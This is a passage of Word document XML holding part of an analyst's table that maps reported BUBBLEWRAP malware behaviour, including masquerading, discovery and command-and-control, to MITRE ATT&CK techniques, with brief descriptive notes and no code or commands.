                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50FE2AAF" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B84A66" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>To install second stage tool above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00ED5880" w14:paraId="1B652B05" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0046112D" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B0DA8DE" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="761404FE" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00672F86" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>Techniques unclear here</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79108346" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09891024" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A3CE45B" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D116880" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FE2D07D" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00672F86" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00672F86">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>We know</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00672F86">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] The BUBBLEWRAP malware is installed with admin rights and the threat actors gain full access to the compromised machine </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="004C5547">
              <w:t>The BUBBLEWRAP Trojan may create a hidden system administrator account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00ED5880" w14:paraId="32C855BC" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13302FF8" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AACE5B5" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve">TA005 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F51577" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>T1036.005 Masquerading: Match Legitimate Name or Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76453F5C" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="599C910D" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66757776" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4374DE9B" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="758CB9FF" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve">Rename second stage tool with benign name. But this is on the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>DropBox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00ED5880" w14:paraId="0A39E449" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A8DEEEE" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4213EDF0" w14:textId="16CF350B" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="001750E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="119BE2FD" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1082 System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="245FAC60" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="056495A7" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ECDD2AC" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39181ABA" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC6305A" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="002D1D50" w14:paraId="0763A2D7" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69F77419" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="552DCA08" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">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58AC84C6" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1102.002 Web Service: Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D6E8109" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43591FB2" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D21B905" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21C3C7FD" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EDC0036" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Bubblewrap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> communications</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09010684" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>not</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> via Dropbox server, this Tech noted in ATT&amp;CK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00ED5880" w14:paraId="6F9143CC" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="146ABE04" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E0863DC" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02EBE8E9" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F52DB08" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18A99814" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D3BFD66" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41750C7E" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="426D20D4" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00F808AD" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
